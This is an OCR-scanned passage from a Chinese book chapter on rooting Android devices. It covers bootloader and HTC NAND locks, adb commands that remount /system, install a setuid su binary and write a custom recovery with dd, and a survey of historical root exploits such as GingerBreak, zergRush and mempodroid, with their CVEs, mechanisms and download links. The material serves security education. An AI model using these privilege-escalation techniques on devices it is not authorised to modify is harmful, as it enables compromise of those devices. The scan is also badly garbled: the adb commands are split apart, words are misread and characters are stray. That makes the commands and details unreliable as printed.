分 区 与 恢复 分 区 进行 验证 。 在 这 种 情况 下 , 启动 一 个 定制 内 核 或 一 个 修改 后 的 恢复 镜像 是 不 被 允 
许 的 ， 但 仍然 可 以 修改 系统 分 区 。 你 可 以 通过 修改 出 厂 镜像 的 系统 分 区 来 实施 root( 见 3.4 节 )。 

在 某 些 设备 上 , 虽然 引导 分 区 被 锁定 使 得 启动 一 个 定制 内 核 被 禁止 , 但 是 通过 在 手机 开机 时 
以 恢复 模式 启动 , 仍然 可 以 在 恢复 分 区 中 刷 和 人 一 个 定制 的 引导 镜像 , 并 使 用 定制 内 核 来 启动 系统 。 
在 这 种 情况 下 ， 通 过 修改 定制 引导 镜像 initrd 的 default.prop 文件 ， 仍 然 可 以 使 用 aab shell 来 
获得 root 访问 权限 〈 见 3.5.1 节 )。 在 某 些 设备 中 ， 官 方 恢复 镜像 允许 应 用 使 用 默认 Android 测试 
密 钥 签名 的 更 新 包 。 这 个 密 钥 是 那些 没有 指定 密 钥 的 应 用 包 所 使 用 的 通用 密 钥 ,被 包含 在 AOSP 
源码 树 的 build/target/product/security 目录 中 。 你 可 以 通过 应 用 一 个 包含 su 二 进 制程 序 的 定制 更 新 
包 来 对 这 类 设备 进行 root。 我 们 并 不 清楚 厂商 的 这 一 “ 玻 忽 ” 是 否 有 意 为 之 ， 但 可 以 确定 这 个 方 
法 在 运行 Android 4.0 和 官方 恢复 镜像 3e 版 本 的 某 些 三 星 设备 上 是 可 行 的 。 

最 坏 的 情况 是 ,引导 加 载 程 序 限 不 允许 你 启动 一 个 未 能 通过 签名 验证 的 分 区 。 这 时 ,你 只 能 
使 用 其 他 的 技术 来 获取 root 访问 权限 ， 下 面 我 们 就 来 详细 介绍 。 


3.5.1 在 已 启动 系统 中 获取 root 权限 


在 一 个 已 启动 系统 上 获得 初始 root 访问 权限 , 通常 是 通过 Android 操作 系统 中 未 修补 的 安全 
漏洞 来 获得 一 个 root shell。 这 类 root 方法 也 被 广泛 称 为 “ 软 root”( soft root )， 因 为 这 种 攻击 几 
平 完 全 是 基于 软件 的 。 通 常 ， 软 root 的 完成 方式 是 多 种 多 样 的 ， 可 以 利用 Android 内 核 ， 以 root 
权限 运行 的 进程 , 设置 了 set-uid 位 的 程序 中 的 安全 漏洞 、 针 对 文件 权限 bug 的 符号 链接 攻击 , 或 
者 其 他 类 型 的 安全 漏洞 。 由 于 程序 员 可 能 在 许多 地 方 引 入 各 种 类 型 的 错误 , 因此 这 种 方法 有 很 多 
种 可 能 。 

尽管 root 的 set-uid 或 set-gid 二 进 制 文件 在 Android 官方 版 本 中 并 不 常见 ， 但 是 运营 商 或 设 
备 制造 商 有 时 会 在 他 们 的 定制 修改 版 本 中 引入 一 些 。 这 些 set-uid 二 进 制 文件 中 任意 一 个 的 安全 
漏洞 都 有 可 能 导致 权限 提升 ， 最 终 使 设备 被 获取 root 访问 权限 。 

另 一 个 常见 的 场景 是 利用 以 root 权限 运行 的 进程 中 的 安全 漏洞 。 这 样 的 一 个 漏洞 利用 可 以 让 
你 以 root 权限 执行 任意 代码 。 本 章 结尾 部 分 将 包含 若干 个 这 类 实例 。 

你 将 在 第 12 章 看 到 ， 随 着 Android 系统 日 趋 成 熟 ， 这 类 漏洞 利用 变 得 越 来 越 困 难 。 新 的 
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Android 发 布 版 本 中 一 直 在 引入 一 些 新 的 攻击 缓解 技术 和 安全 加 固 特性 。 

利用 adbd 来 获取 root 权限 

adbd 守护 进程 是 以 root 权限 开始 运行 的 ， 然 后 会 降 权 至 shell 用 户 ( AID_SHELL )， 除 非 属 
性 ro.secure 被 设置 为 0。 然 而 这 一 属性 是 只 读 的 ， 通 常情 况 下 由 引导 镜像 initrd 设置 成 
ro.secure=1， 了 解 这 点 是 非常 重要 的 。 

adbd 守护 进程 在 属性 ro .kernel .qemu 被 设置 为 1 时， 也 会 以 root 权限 启动 ， 而 不 会 降 权 
至 shell 用 户 ， 即 在 Android 模拟 器 中 启动 adbd 以 root 权 限 运 行 。 但 是 这 个 属性 也 是 只 读 的 ,在 
真实 的 设备 上 通常 不 会 设置 。 

Android 4.2 之 前 的 版 本 将 在 启动 时 读 取 /data/local.prop 文件 并 应 用 这 个 文件 中 的 所 有 属性 。 
在 Android 4.2 版 本 中 ， 当 ro .debuggable 被 设置 为 1 时 ， 这 个 文件 只 有 在 非 用 户 构建 (build ) 
中 才 是 可 读 的 。 

/data/local.prop 文件 以 及 ro.secure 和 ro.kernel .demu 属性 是 获取 root 访 问 的 关键 所 在 。 
将 这 些 牢 记 于 心 ， 因 为 你 会 在 3.6 节 中 看 到 一 些 使 用 它们 的 漏洞 利用 。 
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3.5.2 NAND 锁 、 临 时 性 root 与 永久 性 root 


某 些 HTC 设备 在 无 线 电 非 易 失 随机 存 取 存储 器 (NVRAM ) 中 有 一 个 安全 标志 位 ( @secuflag )， 
这 一 标志 位 会 被 设备 的 引导 加 载 程序 (HBOOT ) 检查 。 当 这 个 标志 位 设置 为 true 时 ， 引 导 加 载 
程序 会 显示 一 条 “security on” 消 息 (S-ON )， 而 NAND 锁 会 被 强制 执行 。NAND 锁 防 止 对 系统 、 
启动 和 恢复 分 区 进行 写 人 ， 而 启用 S-ON 模式 后 ,重新 启动 将 失去 root 权限 ,并且 对 于 这 些 分 区 
的 写 人 不 会 持久 化 。 这 使 得 定制 系统 ROM、 定 制 内 核 和 定制 恢复 修改 都 不 再 可 行 。 

但 是 我 们 仍然 有 可 能 通过 对 一 个 足够 严重 的 安全 漏洞 的 利用 获取 到 root 权限 ， 然 而 NAND 
锁 使 得 所 有 的 修改 在 重启 之 后 都 会 丢失 ， 这 在 Android MOD (修改 ) 社区 中 被 称 为 临时 性 root。 

为 了 对 开启 NAND 锁 的 HTC 设备 进行 永久 性 foot， 必 须 完 成 以 下 两 件 事 中 的 一 件 。 一 是 禁 
用 基带 上 的 安全 标志 位 ; 二 是 将 设备 刷 上 一 个 不 会 实施 NAND 锁 的 打 补 丁 的 HBOOT 或 工程 
HBOOT。 在 两 种 情况 下 ， 引 导 加 载 程序 都 会 显示 一 条 “security of ”消息 (S-OFF )。 图 3-3 给 出 
了 锁定 的 和 解锁 的 HTC HBOOT 的 对 比 情况 。 

在 2011 年 8 月 HTC 提供 官方 引导 加 载 程序 解锁 过 程 之 前 ， 采 取 打 补丁 的 HBOOT 是 唯一 可 
用 的 方案 。 在 某 些 设备 上 可 以 使 用 一 些 非 官方 的 引导 加 载 程序 解锁 工具 ， 如 AlphaRev 
( http://alpharev.nl/ ) 和 Unrevoked ( http://unrevoked.com/ )， 二 者 后 来 合并 为 Revolutionary.io 工具 
( http://revolutionary.io/ ),。 这 些 工具 通常 组 合 使 用 多 个 公开 或 私有 的 漏洞 利用 代码 ,以 刷 入 打 补 丁 
的 引导 加 载 程 序 并 绕 过 NAND 锁 。 在 大 多 数 情况 下 , 重新 刷 入 一 个 官方 的 HBOOT, 就 可 以 再 次 
激活 设备 的 安全 标志 位 ( S-ON )。 

可 以 从 http://unlimited.io/ 获 取 的 Unlimited.io 漏洞 利用 程序 ， 如 JuopunutBear、LazyPanda 和 
DirtyRacun， 通 过 组 合 利用 多 个 在 HTC Android ROM 和 设备 基带 中 存在 的 安全 漏洞 ， 在 某 些 设 
备 上 达到 完全 的 无 线 电 S-OFF 效果 。 
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图 3-3 ”锁定 和 解锁 的 HTC HBOOT 对 比 


2010 年 12 月 ，Scott Walker 以 GPLv3 版 权 许 可 证 发 布 了 gfree 漏洞 利用 程序 (https:/github. 
com/tmzt/g2root-kmod/tree/master/scotty2/gfree )。 这 个 漏洞 利用 程序 可 以 禁用 工 Mobile G2 的 谍 人 
式 多 媒体 卡 (eMMC ) 保护 机 制 。eMMC 内 存 中 包含 了 基带 的 分 区 ， 当 引导 加 载 程 序 初始 化 硬件 
时 以 只 读 模式 启动 。 然 后 这 个 漏洞 利用 程序 使 用 一 个 Linux 内 核 模 块 来 重新 启动 eMMC 芯片 ， 
并 将 @secuflag 设置 为 false。 最 后 ， 它 将 在 内 核 中 安装 一 个 多 媒体 卡 (MMSC ) 块 请 求 过 滤器 ， 以 
移 除 对 隐藏 无 线 电 设置 分 区 的 写 保 护 。 

当 HTC 开启 它 的 官方 解锁 门户 网 站 后 ， 它 为 某 些 设备 提供 了 HBOOT 镜像 ， 人 允许 用 户 对 引 
导 加 载 程序 进行 解锁 并 解除 NAND 锁 ， 步 又 如 下 。 

(1) 首先 用 户 应 该 执行 fastboot oem get_identifier_token 命令 ,3 引导 加 载 程 序 会 显 
示 一 个 令 牌 (token )， 用 户 应 该 将 其 提交 到 HTC 的 解锁 门户 网 站 。 

(2) 在 提交 标识 符 令 牌 后 ， 用 户 会 接收 到 一 个 为 其 手机 定制 的 Unlock_code.bin 文件 ， 这 个 文 
件 由 HTC 的 私 钥 签名 ， 应 该 使 用 fastboot flash unlocktoken Unlock_code.bin 命令 将 
其 刷 入 设备 中 。 

如 果 Unlock_code.bin 文件 是 有 效 的 ， 手 机 将 允许 使 用 标准 的 fastboot flash 命令 ,来 刷 
人 未 经 签名 的 分 区 镜像 。 此 外 ， 也 允许 不 加 限制 地 启动 这 些 未 经 签名 的 分 区 。 图 3-4 描述 了 解锁 
设备 的 一 般 流 程 。HTC 和 摩托 罗拉 是 两 家 应 用 了 这 类 解锁 过 程 的 厂商 。 

其 他 设备 ， 如 东芝 的 某 些 款 平板 电脑 ， 也 有 NAND 锁 。 对 于 这 些 设备 ， 锁 是 由 sealime 可 加 
载 内 核 模块 来 实施 的 ， 而 这 一 模块 存在 于 引导 镜像 initrd 中 。 这 个 模块 以 SEAndroid 为 基础 ， 防 
止 重新 挂 载 系统 分 区 进行 写 操作 。 
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> 
Ng 
wr 
引导 加 载 程序 解锁 门户 引导 加 载 程 
锁定 的 设备 2 x 序 被 解锁 
步骤 1 步骤 2 中 步骤 3 步骤 4 
用 户 使 用 fastboot 获 得 | | 用 户 向 OEM 解 锁 门户 | | 解锁 门户 网 站 验证 || 用 户 使 用 提供 的 解 
手机 的 解锁 令 牌 网 站 提交 解锁 令 牌 令 牌 ， 并 发 送 解锁 | | 锁 密 钥 与 fastboot 来 
密 钥 解锁 设备 
用 户 





图 3-4 解锁 引导 加 载 程序 的 一 般 流程 


3.5.3 ”对 软 root 进 行 持久 化 





如 果 


你 拥有 一 个 root shell ( 软 root )， 要 实现 永久 的 root 访问 权限 是 非常 




















A 
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简单 的 。 在 没有 开 


启 NAND 锁 的 手机 上 ， 你 只 需要 对 系统 分 区 的 写 权 限 。 如 果 手 机 有 NAND 锁 ， 那 么 首先 需要 移 
除 掉 它 (参见 3.5.2 节 )。 
NAND 锁 被 移 除 之 后 , 你 就 可 以 简单 地 以 读 写 模式 重新 挂 载 系 统 分 区 , 放置 一 个 设置 set-uid 


root 权限 的 su 二 进 制程 序 ， 然 后 再 次 以 只 











包装 应 用 ， 如 SuperUser 或 SuperSU。 


对 上 述 流程 进行 自动 化 的 一 





的 宿主 计算 机 上 运行 如 下 命令 : 


adb 
adb 
adb 
adb 
adb 
adb 


shell mount 
adb push su 
shell chown 
shell chmod 
shell mount 


-OO remount,rw /system 
/system/xbin/su 

0.0 /system/xbin/su 
06755 /system/xbin/su 
-oO remount,ro /system 


install Superuser.apk 


读 模式 挂 载 。 当 然 ， 你 也 可 以 选择 安装 一 个 su 程序 的 


一 个 常用 方法 是 ， 在 连接 到 启用 了 USB 调试 模式 的 Android 设备 











保留 持久 性 root 0 种 方法 是 将 定制 恢复 镜像 写 入 恢复 分 区 中 ， 
用 aa 命令 做 到 这 点 。 这 相当 于 通过 fastboot 或 下 载 模式 刷 入 一 个 定 外 


设备 上 使 





可 以 在 Android 





判 的 恢复 镜像 ， 这 
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个 过 程 在 3.4 市 中 已 经 介绍 过 。 
首先 ， 你 需要 确定 设备 上 恢复 分 区 的 位 置 。 例 如 : 
shell@android:/ # ls -1 /dev/block/platform/*/by-name/recovery 
lrwxrwxrwx root root 2012-11-20 14:53 recovery -> /dev/block/mmcblk0p7 
前 面 的 输出 显示 了 恢复 分 区 在 这 个 设备 上 位 于 /dev/block/mmcblk0p7 处 。 
现在 ， 你 可 以 将 一 个 定制 恢复 镜像 复制 到 SD 卡 上 ， 然 后 写 入 恢复 分 区 : 


adb shell push custom-recovery.img /sdcard/ 
adb shell dd if=/sdcard/custom-recovery.img of=/dev/block/mmcblk0p7 


最 后 ， 你 需要 重新 启动 ， 进 入 定制 恢复 模式 ， 并 应 用 su 更 新 包 。 


adb reboot recovery 


























3.6 ”历史 上 的 一 些 已 知 攻 击 


本 市 将 讨论 获取 Android 设 备 root 访 问 权限 的 许多 先前 已 知 的 方法 .通过 展示 这 些 安全 漏洞 ， 
我 们 希望 让 你 了 解 获得 Android 设备 root 访问 权限 的 各 种 可 能 途径 。 虽 然 其 中 的 一 些 安全 漏洞 影 
响 到 更 大 的 Linux 生态 圈 , 但 大 部 分 是 Android 系统 特有 的 。 其 中 许多 安全 漏洞 在 无 法 访问 ADB 
shell 时 不 能 利用 。 在 每 个 案例 中 , 我 们 都 将 讨论 安全 漏洞 的 根源 , 以 及 如 何 利用 漏洞 的 关键 细节 。 



































注意 ”细心 的 读者 可 能 会 注意 到 ， 以 下 安全 漏洞 中 有 几 个 是 由 多 个 不 同 的 团队 在 互 不 知晓 的 情 
况 下 独立 发 现 的 。 虽 然 这 种 情况 (“ 撞 洞 ” ) 并 不 是 很 普遍 ， 但 的 确 会 时 不 时 地 发 生 。 


本 节 中 提供 的 一 些 漏洞 利用 细节 具有 很 强 的 技术 性 。 如 果 你 无 法 理解 ,或 者 你 已 经 非常 熟悉 








用 ,第 8 章 会 就 其 中 几 个 漏洞 利用 介绍 更 多 细节 。 
3.6.1 ”内核 : Wunderbar/asroot 


这 个 漏洞 是 由 谷歌 安全 团队 的 Tavis Ormandy 和 Julien Tinnes 发 现 的 ， 并 被 编号 为 
CVE-2009-2692: 




















Linux 内 核 从 2.6.0 至 2.6.30.4 版 本 , 以 及 2.4.4 至 2.4.37.4 版 本 , 没有 为 proto_ops 
结构 中 套 接 字 操作 的 所 有 函数 指针 进行 初始 化 ,导致 本 地 用 户 可 以 触发 空 指针 引用 ， 以 
及 通过 使 用 mmap 来 映射 zero 页 面 ， 在 zero 页 面 上 放置 任意 代码 ， 然 后 调用 一 个 不 可 用 
的 操作 来 获得 权限 。 该 漏洞 通过 PF PPPOX 套 接 字 上 的 sendpage 操作 ( sock_sendpage 
函数 ) 进行 了 验证 。 
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Brad Spengler ( spender ) 为 x86/x86_64 架构 编写 了 该 安全 漏洞 的 利用 程序 Wunderbar， 这 也 
让 这 个 漏洞 得 到 了 它 啊 亮 的 名 字 。 然 而 为 Android ( ARM 架构 上 的 Linux 操作 系统 ) 编写 的 利用 
程序 是 由 Christopher Lais ( Zinx ) 发 布 的 ， 命 名 为 asroot， 并 公开 在 http:/g1lfiles.webs.comy/Zinx/ 
android-root-20090816.tar gz 上。 该 利用 程序 对 于 所 有 使 用 存在 漏洞 内 核 的 Android 版 本 都 适用 。 

asroot 利用 程序 在 地 址 0 处 引入 了 一 个 新 的 .NULL 节 ， 正 好 拥有 一 个 内 存 页 面 的 大 小 。 这 个 
节 中 包含 着 将 当前 用 户 ID (UID ) 和 用 户 组 ID (GID ) 设置 为 root 的 代码 。 接 下 来 ， 利 用 程序 
调用 sendfile 函数 ， 导 致 在 PF_ BLUETOOTH 套 接 字 上 的 一 个 sendpage 操作 ， 然 而 缺少 了 对 
proto_ops 结构 的 初始 化 。 这 会 导致 .NULL 节 中 的 代码 以 内 核 模 式 执行 , 最终 获 取 一 个 root shell。 









































3.6.2 恢复 : Volez 


Android 2.0 和 2.0.1 版 本 的 恢复 镜像 所 使 用 的 签名 验证 机 制 中 有 个 “ 手 拌 ” 的 错误 ,使 得 恢 
复 进程 在 一 个 已 签名 的 更 新 zip 文件 中 错误 地 检测 End of Central Directory ( EOCD ) 记录 。 这 个 
安全 漏洞 导致 可 以 修改 已 签名 OTA 恢复 包 中 的 内 容 。 

这 个 签名 验证 机 制 的 漏洞 是 由 Mike Baker ( [mbm] ) 发 现 的 ， 并 被 用 于 在 摩托 罗拉 Droid 设 
备 的 第 一 个 官方 OTA 包 发 布 时 对 该 设备 进行 root。 通过 创建 一 个 特别 构造 的 zip 文件， 可 以 将 一 
个 su 二进制 程序 注入 已 签名 的 OTA zip 文 件 中 。 之 后 ，Christopher Lais ( Zinx ) 编写 了 Volez， 用 来 
从 一 个 合法 签名 的 更 新 zip 文件 中 创建 出 定制 的 更 新 zip 文件 ， 这 一 工具 可 从 http://zenthought.org/ 
content/project/volez 下 载 到 。 












































3.6.3 udev: Exploid 


这 个 安全 漏洞 影响 了 Android 2.1 及 之 前 的 所 有 版 本 。 它 最 初 在 x86 Linux 系统 使 用 的 udev 
守护 进程 中 被 发 现 , 并 被 编号 为 CVE-2009-1185。 后 来 , 谷歌 义 在 用 于 处 理 Android 中 udev 功能 
的 init 守护 进程 中 引入 了 这 一 漏洞 。 

它 的 漏洞 利用 程序 依赖 于 udev 代码 验证 NETLINK 消息 来 源 的 失效 ， 这 一 失效 允许 用 户 空 
间 进 程 发 送 一 个 号 称 来 源 于 受信 任 内 核 的 udev 事件。 由 Sebastian Krahmer ( The Android Exploid 
Crew ， 最 初 发 布 的 Exploid 利用 程序 ， 必 须 从 设备 上 一 个 可 写 并 可 执行 的 目录 中 运行 。 

一 步 ， 漏 洞 利用 程序 创建 了 一 个 域 为 PF_ NETLINK 、 家 族 为 NETLINK KOBJECT 
i (发 往 用 户 空间 事件 的 内 核 消息 ) 的 套 接 字 ; 第 二 步 , 它 在 当前 目录 中 创建 一 个 hotplug 
文件 ， 该 文件 包含 到 exploid 二 进 制 程序 的 路 径 ; 第 三 步 ， 它 在 当前 路 径 创 建 一 个 指向 
/proc/sys/kernel/hotplug 的 符号 链接 data; 第 四 步 ， 它 向 NETLINK 套 接 字 发 送 一 条 伪造 的 消息 

init 进程 在 接收 到 这 条 消息 , 验证 其 来 源 失 败 后 , 它 将 继续 处 理 , 将 hotplug 文件 中 的 内 容 复 
制 到 data 文件 中 。 他 是 以 root 权限 进行 的 这 些 操作 。 当下 一 次 hotplug 事件 发 生 时 ( 比如 断 开 和 
重新 连接 Wi-Fi 接口 )， 内 核 将 以 root 权限 执行 exploid 二 进 制程 序 。 

在 这 一 时 间 点 上 , 漏洞 利用 程序 将 检测 到 它 以 root 权限 运行 , 随后 重新 以 读 写 模式 挂 载 系统 
分 区 ， 并 在 路 径 /systemy/bin/rootshell 上 创建 一 个 set-uid 的 root shell。 
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3.6.4 adbd: RageAgainstTheCage 


如 前 所 述 , 在 3.5.1 节 中 , ADB 守护 进程 (adbd 进程 ) 以 root 权限 开始 启动 , 然后 降 权 至 shell 
用 户 。 在 Android 2.2 及 之 前 的 版 本 中 , ADB 守护 进程 在 降 权 时 不 会 检查 setuia 调用 的 返回 值 。 
Sebastian Krahmer 利用 了 adbd 中 这 一 检查 缺失 的 安全 漏洞 ， 开 发 了 RageAgainstTheCasge 利用 程 
序 ( 下 载 地 址 为 http://stealth.openwall.net/xSports/RageAgainstTheCage.tgz )。 

这 一 漏洞 利用 程序 必须 通过 ADB shell 在 shell UID 用 户 环 境 下 运行 。 基 本 原理 是 : 利用 程序 
一 直 fork 进程 直至 fork 调用 失败 ， 这 意味 着 该 用 户 的 进程 创建 数 已 经 达到 极限 。 这 是 内 核实 施 
的 强制 限制 ， 称 为 RLIMIT _NPROC， 它 指定 了 可 以 为 调用 进程 的 真实 UID 创建 的 最 大 进程 (或 
线程 ) 数 。 在 这 一 时 间 点 上 ， 漏 洞 利用 程序 杀 掉 adbd， 导 致 它 以 root 权限 重新 启动 。 遗 憾 的 是 ， 
这 时 adbd 无 法 降 权 到 shell， 因 为 对 于 shell 用 户 的 进程 限制 已 经 达到 了 。setuia 调用 会 失败 ， 
但 adbd 并 不 检测 这 个 失败 ， 所 以 仍然 继续 以 root 权限 运行 。 一 旦 攻击 成 功 ，adbd 将 会 通过 adb 
shell 命令 提供 root shell。 








































































































3.6.5 Zygote: Zimperlich 和 Zysploit 


第 2 章 介 绍 过 ， 所 有 的 Android 应 用 是 由 Zygote 进程 fork 分 支 后 启动 的 。 你 可 能 已 经 猜 到 ， 
Zygote 进程 是 以 root 权 限 运 行 的 ,在 fork 之 后 ,新 的 进程 将 使 用 setuia 调用 降 权 至 目标 应 用 的 UID。 

与 RageAgainstTheCage 利用 的 漏洞 类 似 ，Android 2.2 及 之 前 版 本 的 Zygote 进程 没有 对 降 权 
时 的 setuia 调用 返回 值 进 行 检 查 。 同 样 ， 在 耗 尽 目标 程序 UID 的 最 大 进程 数 之 后 ，Zygote 便 
无 法 降低 它 的 权限 ， 然 后 就 以 root 权限 启动 应 用 了 。 

Joshua Wise 的 Unrevoked 解锁 工具 早期 发 行 版 本 利用 了 该 漏洞 。 后 来 ,在 Sebastian Krahmer 
将 Zimperlich 利用 程序 源码 公开 到 http://c-skills.blogspot.com.es/2011/02/zimperlich-sources.html 页 
面 上 后 ，JoshuaWise 也 公开 了 他 的 Zysploit 利用 程序 实现 ， 可 以 从 https://github.com/unrevoked/ 
zysploit 获 取 。 





















































3.6.6 ashmem: KillinglnTheNameOf 和 psneuter 


Android 的 共享 内 存 (ashmem ) 子 系统 是 一 个 共享 内 存 分 配器 。 它 类 似 于 POSIX 共享 内 存 
( SHM )， 但 是 行为 不 同 ， 并 且 其 基于 文件 的 API 也 更 为 简单 。 共 享 内 存 可 以 通过 mmap 或 者 文 
件 IO 进行 访问 。 

两 个 流行 的 root 提 权 利用 使 用 了 Android 2.3 之 前 版 本 的 ashmem 实现 中 的 一 个 安全 漏洞 。 在 
受 影 响 的 版 本 中 ，ashmem 允许 任何 用 户 重 新 映射 属于 init 进程 的 共享 内 存 ， 将 包含 系统 属性 地 
址 空间 的 内 存 进行 共享 ， 而 这 是 Android 操作 系统 的 关键 全 局 数据 存储 。 这 个 安全 漏洞 的 CVE 
编号 为 CVE-2011 -1149。 

由 Sebastian Krahmer 开发 的 KillingInTheNameOf 利用 程序 将 系统 属性 空间 重新 映射 为 可 写 ， 
并 将 ro.secure 属性 设置 为 0。 在 重新 启动 系统 或 者 重新 运行 adbd 后 ，ro .secure 属性 的 修 
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改 会 允许 通过 ADB shell 取得 root 访问 权限 。 可 以 从 http://c-skills.blogspot.com.es/2011/01/adb- 
trickery-again.html 页 面 下 载 到 这 个 利用 程序 。 

psneuter 利用 程序 是 由 Scott Walker ( scotty2 ) 开发 的 ， 它 使 用 同一 个 安全 漏洞 来 限制 对 系统 
盟 性 空间 的 权限 。 通 过 这 个 操作 ，adbd 将 无 法 读 取 *o.secure 属性 的 值 来 确定 是 否 降 权 至 shell 
用 户 。 在 无 法 确定 ro .secure 属性 值 的 时 候 , 利用 程序 会 假设 ro .secure 的 值 为 0, 并 且 不 降 
权 。 同 样 ， 这 使 得 可 以 通过 ADB shell 获得 root 访问 权限 。 可 以 从 https://github.com/tmzt/g2root- 
kmod/tree/ scotty2/scotty2/psneuter 页 面 下 载 到 psneuter 利用 程序 。 
















































































3.6.7 vold: GingerBreak 





这 个 安全 漏洞 被 编号 为 CVE-2011-1823 ， 由 Sebastian Krahmer 在 GingerBreak 利用 程序 中 首 
次 演示 ，GingerBreak 利用 程序 可 以 从 http:/c-skills.blogspot.com.es/2011/04/yummy-yummy- 
gingerbreak.html 页 面 下 载 到 。 























在 Android 3.0 版 本 和 2.3.4 之 前 的 2.x 版 本 上 的 volume 守护 进程 (vold ) 由 于 信任 
从 PF NETLINK 套 接 字 接 收 到 的 消息 ， 因 此 允许 以 root 权限 执行 任意 代码 ， 利 用 方法 
是 通过 一 个 负数 索引 绕 过 只 针对 最 大 值 的 有 符号 整数 检查 。 











在 触发 这 个 安全 漏洞 之 前 , 利用 程序 会 从 系统 中 收集 各 种 信息 。 首先 , 它 打 开 /proc/net/netlink 
提取 vold 进程 的 进程 标志 符 ( PID )， 然 后 检查 系统 的 C 库 (libc.so ) 来 找到 system 和 stremp 的 
符号 地 址 ， 接 下 来 它 将 解析 vold 可 执行 程序 的 ELF 文件 头 ， 来 定位 全 局 但 移 表 (GOT ) 分 节 ， 
随后 它 将 解析 vold.fstab 文件 来 找到 设备 的 /sdcard 挂 载 点 ， 最 后 ， 为 了 发 现 正确 的 负数 索引 值 ， 
它 会 在 监视 logcat 输出 的 同时 故意 让 服务 前 省 。 

在 收集 信息 后 ， 利 用 程序 会 通过 发 送 包含 经 过 计算 的 负数 索引 值 的 恶意 NETLINK 消息 , 来 
触发 安全 漏洞 。 这 会 导致 vold 修改 在 它 自己 GOT 表 中 的 条 目 ， 以 指向 system 函数 。 一 旦 目标 
GOT 表 中 的 一 个 条 目 被 覆盖 ，vold 将 以 root 权限 执行 GingerBreak 二 进 制 程序 。 

这 个 利用 程序 检测 到 它 已 经 在 root 权限 下 运行 后 , 便 会 进入 到 最 后 一 个 阶段 , 在 这 时 , 利用 
程序 首先 重新 挂 载 /data 以 移 除 nosuid 标志 位 ， 然 后 将 /data/local/tmp/sh 修改 为 set-uid root， 最 后 
它 将 退出 以 root 权 限 运 行 的 新 进程 ,并 从 原始 的 利用 程序 进程 中 执行 最 新 创建 的 set-uid root shell。 

该 安全 漏洞 的 案例 研究 详 见 8.2.1 节 。 



































3.6.8 PowerVR: levitator 


2011 年 10 月, Jon Larimer 和 Jon Oberheide 在 http://jon.oberheide.org/files/levitator.c 上 发 布 了 
levitator 利用 程序 。 这 个 利用 程序 使 用 了 两 个 不 同 的 安全 漏洞 ， 它 们 会 影响 使 用 PowerVR SGX 
忆 片 组 的 Android 设备 。Android 2.3.5 及 之 前 版 本 的 PowerVR 驱动 中 存在 着 如 下 两 个 安全 漏洞 。 























60 第 3 章 root Android 设备 








CVE-2011-1350: PowerVR 驱动 对 一 次 ioctl 系统 调用 返回 响应 数据 到 用 户 模式 时 提 
供 的 长 度 参 数 难 证 失效 ， 导 致 可 以 泄露 最 大 1MB 的 内 核 内 存 。CVE-2011-1352 : 内 核 内 
存 破坏 安全 漏洞 ， 导 致 任意 可 访问 /devwpvrsrvkm 的 用 户 对 前 述 泄 露 内 存 具 有 写 权 限 。 





levitator 利用 程序 结合 使 用 了 这 两 个 安全 漏洞 ， 巧 妙 地 对 内 核 内 存 进 行 破坏 。 在 达成 权限 提 
升 之 后 ， 它 产生 出 一 个 root shell。 对 这 个 安全 漏洞 的 案例 研究 详 见 第 10 章 。 








3.6.9 libsysutils: zergRush 


Revolutionary 团队 在 2011 年 10 月 发 布 了 流行 的 zergRush 利用 程序 ， 源 代码 可 以 从 
https://github.com/revolutionary/zergRush 获 取 , 该 利用 的 安全 漏洞 被 编号 为 CVE-2011-3874, 具体 
描述 如 下 : 
































Android 2.2.2 及 之 前 的 2.2.x 版本， 以 及 2.3.6 及 之 前 的 2.3.x 版 本 的 libsysutils 库 中 
存在 栈 缓 冲 区 溢出 漏洞 ， 允 许 用 户 协助 的 远程 攻击 者 通过 一 个 应 用 程序 调用 
FrameworkListener::dispatchCommand 方法 并 提供 错误 数量 的 参数 ， 从 而 导致 任 
意 代 码 执 行 。 在 zergRush 利用 程序 中 演示 了 和 触发 一 个 释放 后 重用 的 安全 漏洞 。 











该 利用 程序 使 用 了 Volume 管理 守护 进程 来 触发 这 个 安全 漏洞 ， 因 为 它 链接 了 libsysutils.so 
库 并 以 root 权限 运行 。 因 为 栈 是 不 可 执行 的 ,所 以 利用 程序 使 用 libc.so 库 中 的 一 些 gadget， 构 建 
了 一 个 面向 返回 编程 (ROP ) 的 代码 链 。 然后 它 传 递 给 vold 一 个 特殊 构造 的 FrameworkCommand 
对 象 ， 使 得 Runcommand 指向 利用 程序 的 ROP 载荷。 这 将 使 得 载荷 以 root 权限 执行 ， 并 由 载荷 
生成 一 个 root shell, 并 将 ro .kernel .demu 属性 改 为 1。 正 如 前 面 所 提 过 的 那样 , 这 会 导致 ADB 
重启 之 后 获得 root 权限 。 

对 这 个 安全 漏洞 的 案例 研究 详 见 多 
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3.6.10” 内核: mempodroid 





























这 个 安全 漏洞 是 由 Jiri Aedla 发 现 的 ， 并 被 编号 为 CVE-2012-0056: 





























Linux 内 核 2.6.39 及 其 他 版 本 中 的 mem_write 函数 ， 当 ASLR 被 禁用 时 ， 在 对 
/proc/<pid>/mem 进行 写 操作 时 没有 恰当 地 检查 权限 ， 从 而 允许 本 地 用 户 通过 修改 进程 
内 存 获 取 权 限 。 该 安全 漏洞 通过 Mempodipper 利用 程序 进行 了 演示 。 























/proc/<pid>/mem 的 文件 系统 条 目 是 一 个 可 用 来 访问 进程 内 存 页 面 的 接口 ， 访 问 方式 是 通 
POSIX 标准 文件 操作 (如 open 、read 、lseek 等 ) 完成 的 。 在 Linux 内 核 版 本 2.6.39 中 ， 对 其 他 i 
程 内 存 的 防护 机 制 被 错误 地 移 除了 。 








岩 
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Jay Freeman ( saurik ) 基于 之 前 由 Jason A.Donenfeld ( zx2c4 ) 开发 的 Linux 操作 系统 利用 程 
序 Mempodipper， 编 写 了 对 Android 系统 的 mempodroid 利用 程序 。mempodroid 利用 程序 使 用 了 
这 一 安全 漏洞 ， 直接 将 代码 写 入 run-as 程序 的 代码 片段 中 。 而 这 个 程序 ,是 用 来 以 特定 应 用 UID 
身份 来 执行 命令 的 ， 在 官方 Android 系统 中 是 以 set-uid root 运行 的 。 因 为 run-as 在 Android 上 是 
静态 链接 的 ， 所 以 利用 程序 需要 知道 setresuid 调用 和 exit 函数 的 准确 地 址 ， 然 后 攻击 载荷 
就 可 以 被 放置 到 正确 的 位 置 上 。mempodroid 利用 程序 的 源 代码 可 以 从 https://github.com/saurik/ 
mempodroid 获 取 到 。 

该 安全 漏洞 的 案例 分 析 详 见 第 8 章 。 


